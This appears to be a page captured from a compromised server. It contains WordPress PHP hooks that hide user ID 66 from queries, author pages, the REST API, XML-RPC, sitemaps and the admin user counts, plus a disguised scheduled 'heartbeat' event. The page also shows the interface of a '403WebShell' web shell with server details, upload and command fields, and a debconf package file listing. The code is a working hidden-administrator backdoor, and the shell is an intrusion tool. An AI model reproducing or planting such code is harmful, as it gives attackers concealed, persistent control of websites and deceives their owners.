add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/debconf.list
/.
/etc
/etc/apt
/etc/apt/apt.conf.d
/etc/apt/apt.conf.d/70debconf
/etc/debconf.conf
/usr
/usr/bin
/usr/bin/debconf
/usr/bin/debconf-apt-progress
/usr/bin/debconf-communicate
/usr/bin/debconf-copydb
/usr/bin/debconf-escape
/usr/bin/debconf-set-selections
/usr/bin/debconf-show
/usr/sbin
/usr/sbin/dpkg-preconfigure
/usr/sbin/dpkg-reconfigure
/usr/share
/usr/share/bash-completion
/usr/share/bash-completion/completions
/usr/share/bash-completion/completions/debconf
/usr/share/debconf
/usr/share/debconf/confmodule
/usr/share/debconf/confmodule.sh
/usr/share/debconf/debconf.conf
/usr/share/debconf/fix_db.pl
/usr/share/debconf/frontend
/usr/share/doc
/usr/share/doc/debconf
/usr/share/doc/debconf/README.Debian
/usr/share/doc/debconf/changelog.gz
/usr/share/doc/debconf/copyright
/usr/share/lintian
/usr/share/lintian/overrides
/usr/share/lintian/overrides/debconf
/usr/share/man
/usr/share/man/man1
/usr/share/man/man1/debconf-apt-progress.1.gz
/usr/share/man/man1/debconf-communicate.1.gz
/usr/share/man/man1/debconf-copydb.1.gz
/usr/share/man/man1/debconf-escape.1.gz
/usr/share/man/man1/debconf-set-selections.1.gz
/usr/share/man/man1/debconf-show.1.gz
/usr/share/man/man1/debconf.1.gz
/usr/share/man/man8
/usr/share/man/man8/dpkg-preconfigure.8.gz
/usr/share/man/man8/dpkg-reconfigure.8.gz
/usr/share/perl5
/usr/share/perl5/Debconf
/usr/share/perl5/Debconf/AutoSelect.pm
/usr/share/perl5/Debconf/Base.pm
/usr/share/perl5/Debconf/Client
/usr/share/perl5/Debconf/Client/ConfModule.pm
/usr/share/perl5/Debconf/ConfModule.pm
/usr/share/perl5/Debconf/Config.pm
/usr/share/perl5/Debconf/Db.pm
/usr/share/perl5/Debconf/DbDriver
/usr/share/perl5/Debconf/DbDriver/Backup.pm
/usr/share/perl5/Debconf/DbDriver/Cache.pm
/usr/share/perl5/Debconf/DbDriver/Copy.pm
/usr/share/perl5/Debconf/DbDriver/Debug.pm
/usr/share/perl5/Debconf/DbDriver/DirTree.pm
/usr/share/perl5/Debconf/DbDriver/Directory.pm
/usr/share/perl5/Debconf/DbDriver/File.pm
/usr/share/perl5/Debconf/DbDriver/LDAP.pm
/usr/share/perl5/Debconf/DbDriver/PackageDir.pm
/usr/share/perl5/Debconf/DbDriver/Pipe.pm
/usr/share/perl5/Debconf/DbDriver/Stack.pm
/usr/share/perl5/Debconf/DbDriver.pm
/usr/share/perl5/Debconf/Element
/usr/share/perl5/Debconf/Element/Dialog
/usr/share/perl5/Debconf/Element/Dialog/Boolean.pm
/usr/share/perl5/Debconf/Element/Dialog/Error.pm
/usr/share/perl5/Debconf/Element/Dialog/Multiselect.pm
/usr/share/perl5/Debconf/Element/Dialog/Note.pm
/usr/share/perl5/Debconf/Element/Dialog/Password.pm
/usr/share/perl5/Debconf/Element/Dialog/Progress.pm
/usr/share/perl5/Debconf/Element/Dialog/Select.pm
/usr/share/perl5/Debconf/Element/Dialog/String.pm
/usr/share/perl5/Debconf/Element/Dialog/Text.pm
/usr/share/perl5/Debconf/Element/Editor
/usr/share/perl5/Debconf/Element/Editor/Boolean.pm
/usr/share/perl5/Debconf/Element/Editor/Error.pm
/usr/share/perl5/Debconf/Element/Editor/Multiselect.pm
/usr/share/perl5/Debconf/Element/Editor/Note.pm
/usr/share/perl5/Debconf/Element/Editor/Password.pm
/usr/share/perl5/Debconf/Element/Editor/Progress.pm
/usr/share/perl5/Debconf/Element/Editor/Select.pm
/usr/share/perl5/Debconf/Element/Editor/String.pm
/usr/share/perl5/Debconf/Element/Editor/Text.pm
/usr/share/perl5/Debconf/Element/Gnome
/usr/share/perl5/Debconf/Element/Gnome/Boolean.pm
/usr/share/perl5/Debconf/Element/Gnome/Error.pm
/usr/share/perl5/Debconf/Element/Gnome/Multiselect.pm
/usr/share/perl5/Debconf/Element/Gnome/Note.pm
/usr/share/perl5/Debconf/Element/Gnome/Password.pm
/usr/share/perl5/Debconf/Element/Gnome/Progress.pm
/usr/share/perl5/Debconf/Element/Gnome/Select.pm
/usr/share/perl5/Debconf/Element/Gnome/String.pm
/usr/share/perl5/Debconf/Element/Gnome/Text.pm
/usr/share/perl5/Debconf/Element/Gnome.pm
/usr/share/perl5/Debconf/Element/Multiselect.pm
/usr/share/perl5/Debconf/Element/Noninteractive
/usr/share/perl5/Debconf/Element/Noninteractive/Boolean.pm
/usr/share/perl5/Debconf/Element/Noninteractive/Error.pm
/usr/share/perl5/Debconf/Element/Noninteractive/Multiselect.pm
/usr/share/perl5/Debconf/Element/Noninteractive/Note.pm
/usr/share/perl5/Debconf/Element/Noninteractive/Password.pm
/usr/share/perl5/Debconf/Element/Noninteractive/Progress.pm
/usr/share/perl5/Debconf/Element/Noninteractive/Select.pm
/usr/share/perl5/Debconf/Element/Noninteractive/String.pm
/usr/share/perl5/Debconf/Element/Noninteractive/Text.pm
/usr/share/perl5/Debconf/Element/Noninteractive.pm
/usr/share/perl5/Debconf/Element/Select.pm
/usr/share/perl5/Debconf/Element/Teletype
/usr/share/perl5/Debconf/Element/Teletype/Boolean.pm
/usr/share/perl5/Debconf/Element/Teletype/Error.pm
/usr/share/perl5/Debconf/Element/Teletype/Multiselect.pm
/usr/share/perl5/Debconf/Element/Teletype/Note.pm
/usr/share/perl5/Debconf/Element/Teletype/Password.pm
/usr/share/perl5/Debconf/Element/Teletype/Progress.pm
/usr/share/perl5/Debconf/Element/Teletype/Select.pm
/usr/share/perl5/Debconf/Element/Teletype/String.pm
/usr/share/perl5/Debconf/Element/Teletype/Text.pm
/usr/share/perl5/Debconf/Element/Web
/usr/share/perl5/Debconf/Element/Web/Boolean.pm
/usr/share/perl5/Debconf/Element/Web/Error.pm
/usr/share/perl5/Debconf/Element/Web/Multiselect.pm
/usr/share/perl5/Debconf/Element/Web/Note.pm
/usr/share/perl5/Debconf/Element/Web/Password.pm
/usr/share/perl5/Debconf/Element/Web/Progress.pm
/usr/share/perl5/Debconf/Element/Web/Select.pm
/usr/share/perl5/Debconf/Element/Web/String.pm
/usr/share/perl5/Debconf/Element/Web/Text.pm
/usr/share/perl5/Debconf/Element.pm
/usr/share/perl5/Debconf/Encoding.pm
/usr/share/perl5/Debconf/Format
/usr/share/perl5/Debconf/Format/822.pm
/usr/share/perl5/Debconf/Format.pm
/usr/share/perl5/Debconf/FrontEnd
/usr/share/perl5/Debconf/FrontEnd/Dialog.pm
/usr/share/perl5/Debconf/FrontEnd/Editor.pm
/usr/share/perl5/Debconf/FrontEnd/Gnome.pm
/usr/share/perl5/Debconf/FrontEnd/Kde.pm
/usr/share/perl5/Debconf/FrontEnd/Noninteractive.pm
/usr/share/perl5/Debconf/FrontEnd/Passthrough.pm
/usr/share/perl5/Debconf/FrontEnd/Readline.pm
/usr/share/perl5/Debconf/FrontEnd/ScreenSize.pm
/usr/share/perl5/Debconf/FrontEnd/Teletype.pm
/usr/share/perl5/Debconf/FrontEnd/Text.pm
/usr/share/perl5/Debconf/FrontEnd/Web.pm
/usr/share/perl5/Debconf/FrontEnd.pm
/usr/share/perl5/Debconf/Gettext.pm
/usr/share/perl5/Debconf/Iterator.pm
/usr/share/perl5/Debconf/Log.pm
/usr/share/perl5/Debconf/Path.pm
/usr/share/perl5/Debconf/Priority.pm
/usr/share/perl5/Debconf/Question.pm
/usr/share/perl5/Debconf/Template
/usr/share/perl5/Debconf/Template/Transient.pm
/usr/share/perl5/Debconf/Template.pm
/usr/share/perl5/Debconf/TmpFile.pm
/usr/share/perl5/Debian
/usr/share/perl5/Debian/DebConf
/usr/share/perl5/Debian/DebConf/Client
/usr/share/perl5/Debian/DebConf/Client/ConfModule.pm
/usr/share/pixmaps
/usr/share/pixmaps/debian-logo.png
/var
/var/cache
/var/cache/debconf
/usr/share/bash-completion/completions/debconf-show

Youez - 2016 - github.com/yon3zu
LinuXploit